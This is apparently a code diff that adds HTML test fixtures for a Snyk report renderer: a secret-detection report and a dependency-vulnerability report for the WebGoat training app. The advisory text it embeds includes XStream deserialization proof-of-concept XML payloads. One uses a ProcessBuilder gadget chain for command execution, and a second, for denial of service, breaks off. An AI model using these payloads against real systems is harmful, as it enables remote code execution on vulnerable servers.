C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"/>
+          </g>
+        </svg>
+      </a>
+      <div class="test-meta"><p class="timestamp">April 21, 2026 13:27 UTC</p></div>
+    </div>
+    <h1>Snyk Test Report</h1>
+  </div>
+</header>
+<main>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Secret Detection</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 4</span>
+    <span class="severity-badge" style="background:#AB1A1A">1 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">3 HIGH</span>
+    <span class="severity-badge severity-badge--zero">0 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+    <span class="summary-label ignored-label">Ignored issues: 1</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge severity-badge--ignored" style="background:#CE5019">1 HIGH</span>
+    <span class="severity-badge severity-badge--zero">0 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Secrets Issues (4)</h2></summary>
+      <div class="issue-card severity--critical">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#AB1A1A">C</div>
+      <h3>Stripe Secret Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">902c9b0c-ac51-53d8-822b-4e77ab1f8841</li>
+      <li class="card-meta-item">CWE-321, CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--critical">
+      <div class="issue-description"><p>Discovered a potential Stripe Secret Key, risking unauthorized access to payment processing services and sensitive financial data in a test environment.</p></div>
+      <div class="file-location">Found in: <strong>scanner_demo.env, line 8</strong></div>
+    </div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic Secret Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">437c2c15-7d5e-5304-b2a5-b4028664cba3</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Detected a generic secret, which could lead to unauthorized access and sensitive data exposure.</p></div>
+      <div class="file-location">Found in: <strong>scanner_demo.env, line 2</strong></div>
+    </div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic Secret Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">8c090037-304d-503a-845a-95c40aa951a1</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Detected a generic secret, which could lead to unauthorized access and sensitive data exposure.</p></div>
+      <div class="file-location">Found in: <strong>scanner_demo.env, line 11</strong></div>
+    </div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic Secret Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">a29f668e-42dc-5c4b-9a5c-26b9b0e5655c</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Detected a generic secret, which could lead to unauthorized access and sensitive data exposure.</p></div>
+      <div class="file-location">Found in: <strong>scanner_demo.env, line 14</strong></div>
+    </div>
+  </div>
+</div>
+    </details>
+    <details class="finding-type-section">
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Ignored Secrets Issues (1)</h2></summary>
+      <div class="issue-card severity--high ignored">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic Secret Key</h3>
+      <span class="ignored-badge">Ignored</span>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">35469e7c-37c6-5a4b-88a9-8840255d8c0c</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Detected a generic secret, which could lead to unauthorized access and sensitive data exposure.</p></div>
+      <div class="file-location">Found in: <strong>src/config.js, line 9</strong></div>
+    </div>
+  </div>
+  <div class="ignore-details">
+    <div class="ignore-detail"><span class="ignore-label">Expiration:</span> Does not expire</div>
+    <div class="ignore-detail"><span class="ignore-label">Category:</span> wont-fix</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored on:</span> April 21, 2026</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored by:</span> user@example.com</div>
+    <div class="ignore-detail"><span class="ignore-label">Reason:</span> License issue</div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+</main>
+</body>
+</html>

--- a/internal/presenters/testdata/ufm/webgoat.ignore.html
+++ b/internal/presenters/testdata/ufm/webgoat.ignore.html
@@ -1,0 +1,3066 @@
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta name="description" content="42 open issues, 5 ignored.">
+<title>Snyk Test Report</title><style>
+*{box-sizing:border-box;margin:0;padding:0}
+html{scrollbar-gutter:stable}
+body{font-family:-apple-system,BlinkMacSystemFont,avenir next,avenir,segoe ui,helvetica neue,helvetica,Ubuntu,roboto,noto,arial,sans-serif;background:#F5F5F5;color:#393842;line-height:1.5;font-size:100%}
+h1,h2,h3,h4,h5,h6{font-weight:500}
+a,a:link,a:visited{color:#4b45a9;text-decoration:none;border-bottom:1px solid #4b45a9}
+a:hover,a:focus,a:active{opacity:.8}
+a[href^="http://"]:after,a[href^="https://"]:after{background-image:linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%3E%3Cg%3E%3Cpath%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");background-repeat:no-repeat;background-size:.75rem;content:"";display:inline-block;height:.75rem;margin-left:.25rem;width:.75rem}
+hr{border:none;margin:1em 0;border-top:1px solid #d3d3d9}
+code{background-color:#EEE;color:#333;padding:0.25em 0.5em;border-radius:0.25em}
+pre{font-size:14px}
+pre code{padding:10px;font-family:monospace;background-color:#393842;border-radius:4px;color:#fff;display:block;white-space:pre-wrap;overflow-x:auto}
+a code{border-radius:.125rem .125rem 0 0;padding-bottom:0;color:#4b45a9}
+.brand,.brand:link,.brand:visited{display:inline-block;border:none}
+.brand::after{background:none !important;width:0 !important;height:0 !important;content:none !important}
+.report-header{background:#030328;color:#fff;padding:20px 0}
+.report-header .header-inner{max-width:71.25rem;margin:0 auto;padding:0 20px}
+.report-header .header-top{display:flex;justify-content:space-between;align-items:flex-start}
+.report-header .brand svg{display:block}
+.report-header .brand:hover{opacity:.8}
+.report-header h1{font-size:24px;font-weight:500;margin:16px 0 12px}
+.report-header .test-meta{text-align:right;font-size:12px;opacity:.75;max-width:500px}
+.report-header .test-meta .timestamp{margin:0 0 6px}
+.report-header .meta-counts{display:flex;flex-wrap:wrap;gap:4px 0}
+.report-header .meta-count{display:inline-block;margin:0 12px 6px 0;padding-right:12px;border-right:2px solid rgba(255,255,255,.3);font-size:14px}
+.report-header .meta-count:last-child{border-right:none;padding-right:0}
+.container{max-width:71.25rem;margin:0 auto;padding:20px}.container + .container{padding-top:8px;margin-top:20px;border-top:1px solid #e8e8ec}
+.project-summary{background:#fff;border:1px solid #d3d3d9;border-left:5px solid #4B45A9;border-radius:0 4px 4px 0;margin-bottom:24px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,.08)}
+.project-summary .summary-meta{padding:14px 20px;display:grid;grid-template-columns:auto 1fr;gap:4px 12px;font-size:14px;color:#393842}
+.project-summary .meta-label{color:#727184;white-space:nowrap}
+.project-summary .meta-value{color:#393842;word-break:break-word}
+.project-summary .summary-counts{padding:14px 20px;border-top:1px solid #e8e8ec;display:grid;grid-template-columns:auto repeat(4,auto);gap:8px 6px;align-items:center}
+.project-summary .summary-counts .summary-label{font-weight:700;font-size:14px;white-space:nowrap;color:#393842}
+.project-summary .summary-counts .summary-label.ignored-label{color:#727184}
+.severity-badge{padding:4px 10px;border-radius:3px;font-size:12px;font-weight:700;color:#fff;display:inline-block;text-align:center;min-width:70px}
+.severity-badge--zero{background:transparent !important;border:1px solid #d3d3d9;color:#a0a0a0}
+.severity-badge--ignored{opacity:.55}
+.finding-type-section{margin-bottom:32px}
+.finding-type-section[open]{border-bottom:2px solid #e0e0e0}
+.finding-type-section summary{cursor:pointer;list-style:none;padding-bottom:8px}
+.finding-type-section summary::-webkit-details-marker{display:none}
+.finding-type-header{font-size:18px;font-weight:600;margin:0;color:#333;display:flex;align-items:center}
+.finding-type-header .chevron{width:1em;height:1em;margin-right:6px;flex-shrink:0;transition:transform .15s ease}
+.finding-type-header .chevron path{fill:#586069}
+.finding-type-section[open] .finding-type-header .chevron{transform:rotate(90deg)}
+.issue-card{background:#fff;border:1px solid #d3d3d9;border-radius:4px;border-top-width:4px;margin-bottom:20px;position:relative;overflow:hidden}
+.issue-card.severity--critical{border-top-color:#AB1A1A}
+.issue-card.severity--high{border-top-color:#CE5019}
+.issue-card.severity--medium{border-top-color:#D68000}
+.issue-card.severity--low{border-top-color:#88879E}
+.issue-card .card-header{padding:24px}
+.issue-card .card-header-main{display:flex;align-items:flex-start}
+.issue-card .severity-icon{flex-shrink:0;width:32px;height:32px;border-radius:4px;margin-right:12px;display:flex;align-items:center;justify-content:center;color:#fff;font-size:14px;font-weight:700}
+.issue-card h3{display:inline;font-size:22px;font-weight:600;color:#393842;vertical-align:top;margin:0}
+.issue-card .card-meta{display:flex;flex-wrap:wrap;align-items:flex-start;margin:10px 0 0;padding:0;list-style:none}
+.issue-card .card-meta-item{display:inline-block;padding-right:8px;border-right:1px solid #eee;margin-right:8px;font-size:12px;color:#727184}
+.issue-card .card-meta-item:last-child{border-right:none;padding-right:0;margin-right:0}
+.issue-card .risk-score{position:absolute;top:24px;right:24px;text-align:right}
+.issue-card .risk-score__label{font-size:11px;font-weight:700;color:#586069;text-transform:uppercase;line-height:1;margin-bottom:3px}
+.issue-card .risk-score__value{font-size:30px;font-weight:600;color:#24292e;line-height:1}
+.issue-card .card-section{padding:24px;border-top:1px solid #d3d3d9;background-color:#faf9fa}
+.issue-card .card-detail{font-size:14px;color:#586069;margin-bottom:8px}
+.issue-card .card-detail .detail-label{font-weight:600;color:#393842}
+.dep-path{margin:2px 0 2px 16px;font-size:13px}
+.dep-paths-toggle{margin:4px 0 0 0;font-size:13px}
+.dep-paths-toggle summary{cursor:pointer;color:#4b45a9;font-size:12px;margin:2px 0 2px 16px;list-style:none}
+.dep-paths-toggle summary::-webkit-details-marker{display:none}
+.dep-paths-toggle summary::before{content:"▸ "}
+.dep-paths-toggle[open] summary::before{content:"▾ "}
+.dep-paths-toggle .toggle-less{display:none}
+.dep-paths-toggle[open] .toggle-more{display:none}
+.dep-paths-toggle[open] .toggle-less{display:inline}
+.issue-card .vuln-link{margin-top:16px;font-size:13px}
+.issue-description{font-size:14px;color:#393842;margin-top:16px;line-height:1.6}
+.issue-description h2{font-size:18px;font-weight:600;margin:16px 0 8px;color:#393842}
+.issue-description h3{font-size:16px;font-weight:600;margin:14px 0 6px;color:#393842}
+.issue-description p{margin:0 0 12px}
+.issue-description ul,.issue-description ol{margin:6px 0 12px 20px}
+.issue-description li{margin:2px 0}
+.issue-description code{background:#eee;color:#333;padding:1px 4px;border-radius:3px;font-size:13px}
+.issue-description pre{margin:8px 0}
+.issue-description pre code{font-size:13px}
+.issue-description hr{border:none;border-top:1px solid #e0e0e0;margin:12px 0}
+.issue-description table{border-collapse:collapse;margin:8px 0;width:100%;border:1px solid #d3d3d9;border-radius:3px}
+.issue-description th,.issue-description td{border:1px solid #d3d3d9;padding:6px 10px;text-align:left;font-size:13px}
+.issue-description th{background:#f5f5f5;font-weight:600}
+.issue-description td{background:#fff}
+.issue-description a{color:#4b45a9}
+.issue-summary{position:relative;padding:16px 24px;border:1px solid #d3d3d9;border-left-width:4px;border-radius:2px;background-color:#fff;color:#393842;word-break:break-word;margin-top:16px}
+.issue-summary.severity--critical{border-left-color:#AB1A1A}
+.issue-summary.severity--high{border-left-color:#CE5019}
+.issue-summary.severity--medium{border-left-color:#D68000}
+.issue-summary.severity--low{border-left-color:#88879E}
+.issue-summary .issue-description{margin-top:0}
+.issue-summary .file-location{margin-top:10px;font-size:13px;color:#727184}
+.issue-summary .file-location + .file-location{margin-top:4px}
+.card-section > .issue-summary:first-child{margin-top:0}
+.issue-summary .issue-description h2{font-size:15px;margin:12px 0 6px}
+.issue-summary .issue-description h3{font-size:14px;margin:10px 0 4px}
+.issue-summary a[href^="http://"]:after,.issue-summary a[href^="https://"]:after{display:none}
+.no-issues{font-size:15px;color:#586069;padding:12px 0}
+.issue-card.ignored{opacity:.75}
+.issue-card.ignored .card-header{background:#faf9fa}
+.ignored-badge{display:inline-block;background:#727184;color:#fff;font-size:11px;font-weight:700;padding:2px 8px;border-radius:3px;margin-left:10px;vertical-align:middle;text-transform:uppercase;letter-spacing:.5px}
+.ignore-details{background:#f0eff4;padding:16px 24px;border-top:1px solid #d3d3d9;font-size:13px;color:#586069}
+.ignore-details .ignore-detail{margin-bottom:4px}
+.ignore-details .ignore-label{font-weight:600;color:#393842;display:inline-block;min-width:100px}
+.ignored-section{margin-top:20px;padding-top:14px;border-top:1px solid #e8e8ec}
+.ignored-section-header{font-size:16px;font-weight:600;margin:0 0 12px;color:#727184}
+.dataflow{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.dataflow__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.dataflow__heading .heading-char{margin-right:6px;font-size:18px}
+.dataflow__filename{padding:6px 12px;border:1px solid #eee;border-radius:4px;margin:12px 0 6px;font-size:13px;color:#393842;background-color:#fff}
+.dataflow__item{display:flex;align-items:center;padding:4px 8px;font-family:monospace;color:#393842;font-size:14px;border:1px solid transparent;border-width:1px 0}
+.dataflow__item:hover{border-color:#eee;background-color:#fff}
+.dataflow__step{flex:0 0 30px;width:30px;text-align:right;color:#727184;font-size:12px}
+.dataflow__lineno{flex:0 0 60px;padding:0 12px 0 8px;text-align:right;color:#727184;font-size:12px}
+.dataflow__code{flex:1;font-family:monospace;font-size:13px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
+.dataflow__code .marker{padding:2px 6px;border-radius:4px;background-color:rgba(0,0,0,.1);white-space:nowrap}
+.dataflow__item:hover .marker{background-color:#ffc905}
+.dataflow__badge{padding:2px 3px;border:1px solid #d3d3d9;border-radius:2px;margin-left:8px;background-color:#f4f4f6;font-size:11px;line-height:1;font-family:sans-serif;text-transform:uppercase;color:#646374}
+.card-tab-radio{display:none}
+.card-tab-bar{display:flex;padding:6px 24px;border-top:1px solid #d3d3d9;background:#f5f5f5;gap:4px}
+.card-tab-label{padding:5px 15px;font-size:14px;cursor:pointer;border-radius:20px;border:1px solid #d3d3d9;background:#fff;transition:all .2s}
+.card-tab-label:hover{color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .dataflow{display:block}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .fix-analysis{display:none}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-tab-bar label[for^="tab-df"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .fix-analysis{display:block}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .dataflow{display:none}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-tab-bar label[for^="tab-fa"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.fix-analysis{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.card-tab-bar ~ .card-section .dataflow{border-top:none;padding-top:0}
+.card-tab-bar ~ .card-section .fix-analysis{border-top:none;padding-top:0}
+.dataflow__filename:first-child{margin-top:0}
+.fix-analysis__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.fix-analysis__heading .heading-char{margin-right:6px;font-size:18px;color:#2a7b3f}
+@media print{.report-header,.card-tab-bar{display:none}.fix-analysis,.dataflow{display:block !important}.issue-card .card-section{background:none}.marker{border:1px solid #555;background:transparent}.project-summary{border-left-color:#000;border-left-width:3px;box-shadow:none}.project-summary .severity-badge{border:1px solid #999;color:#000;background:transparent !important}}
+</style>
+</head>
+<body><header class="report-header">
+  <div class="header-inner">
+    <div class="header-top">
+      <a class="brand" href="https://snyk.io" title="Snyk - Open Source Security" target="_blank" rel="noopener noreferrer">
+        <svg width="68" height="35" viewBox="0 0 68 35" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Snyk logo">
+          <g fill="#fff" fill-rule="evenodd">
+            <path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"/>
+          </g>
+        </svg>
+      </a>
+      <div class="test-meta"><p class="timestamp">December 04, 2025 14:46 UTC</p></div>
+    </div>
+    <h1>Snyk Test Report</h1>
+  </div>
+</header>
+<main>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Software Composition Analysis</span>
+    <span class="meta-label">Project path</span><span class="meta-value">/Users/catalin.iuga/code/goofs/WebGoat</span>
+    <span class="meta-label">Project</span><span class="meta-value">org.owasp.webgoat:webgoat</span>
+    <span class="meta-label">Target file</span><span class="meta-value">pom.xml (163 dependencies)</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 42</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">22 HIGH</span>
+    <span class="severity-badge" style="background:#D68000">20 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+    <span class="summary-label ignored-label">Ignored issues: 5</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge severity-badge--ignored" style="background:#CE5019">2 HIGH</span>
+    <span class="severity-badge severity-badge--ignored" style="background:#D68000">3 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Security Issues (38)</h2></summary>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">620</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.</p><p>This issue is a variation of CVE-2013-7285, this time using a different set of classes of the Java runtime environment, none of which is part of the XStream default blacklist. The same issue has already been reported for Strut&#39;s XStream plugin in CVE-2017-9805, but the XStream project has never been informed about it.</p><h3>PoC</h3><pre><code>&lt;map&gt;
+  &lt;entry&gt;
+    &lt;jdk.nashorn.internal.objects.NativeString&gt;
+      &lt;flags&gt;0&lt;/flags&gt;
+      &lt;value class=&#39;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&#39;&gt;
+        &lt;dataHandler&gt;
+          &lt;dataSource class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource&#39;&gt;
+            &lt;contentType&gt;text/plain&lt;/contentType&gt;
+            &lt;is class=&#39;java.io.SequenceInputStream&#39;&gt;
+              &lt;e class=&#39;javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator&#39;&gt;
+                &lt;iterator class=&#39;javax.imageio.spi.FilterIterator&#39;&gt;
+                  &lt;iter class=&#39;java.util.ArrayList$Itr&#39;&gt;
+                    &lt;cursor&gt;0&lt;/cursor&gt;
+                    &lt;lastRet&gt;-1&lt;/lastRet&gt;
+                    &lt;expectedModCount&gt;1&lt;/expectedModCount&gt;
+                    &lt;outer-class&gt;
+                      &lt;java.lang.ProcessBuilder&gt;
+                        &lt;command&gt;
+                          &lt;string&gt;calc&lt;/string&gt;
+                        &lt;/command&gt;
+                      &lt;/java.lang.ProcessBuilder&gt;
+                    &lt;/outer-class&gt;
+                  &lt;/iter&gt;
+                  &lt;filter class=&#39;javax.imageio.ImageIO$ContainsFilter&#39;&gt;
+                    &lt;method&gt;
+                      &lt;class&gt;java.lang.ProcessBuilder&lt;/class&gt;
+                      &lt;name&gt;start&lt;/name&gt;
+                      &lt;parameter-types/&gt;
+                    &lt;/method&gt;
+                    &lt;name&gt;start&lt;/name&gt;
+                  &lt;/filter&gt;
+                  &lt;next/&gt;
+                &lt;/iterator&gt;
+                &lt;type&gt;KEYS&lt;/type&gt;
+              &lt;/e&gt;
+              &lt;in class=&#39;java.io.ByteArrayInputStream&#39;&gt;
+                &lt;buf&gt;&lt;/buf&gt;
+                &lt;pos&gt;0&lt;/pos&gt;
+                &lt;mark&gt;0&lt;/mark&gt;
+                &lt;count&gt;0&lt;/count&gt;
+              &lt;/in&gt;
+            &lt;/is&gt;
+            &lt;consumed&gt;false&lt;/consumed&gt;
+          &lt;/dataSource&gt;
+          &lt;transferFlavors/&gt;
+        &lt;/dataHandler&gt;
+        &lt;dataLen&gt;0&lt;/dataLen&gt;
+      &lt;/value&gt;
+    &lt;/jdk.nashorn.internal.objects.NativeString&gt;
+    &lt;string&gt;test&lt;/string&gt;
+  &lt;/entry&gt;
+&lt;/map&gt;
+</code></pre><p>*Note:* <code>1.4.14-jdk7</code>is optimised for OpenJDK 7,  release <code>1.4.14</code> are compatible with other JDK projects.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a <a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078" target="_blank" rel="noopener noreferrer">popular library (Apache Commons Collection)</a>. These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.</p><p>An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.</p><p>&gt; Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java&#39;s strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which i</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">240</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088337</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;javafx.collections.ObservableList$1&#39;/&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+      &lt;dataHandler&gt;
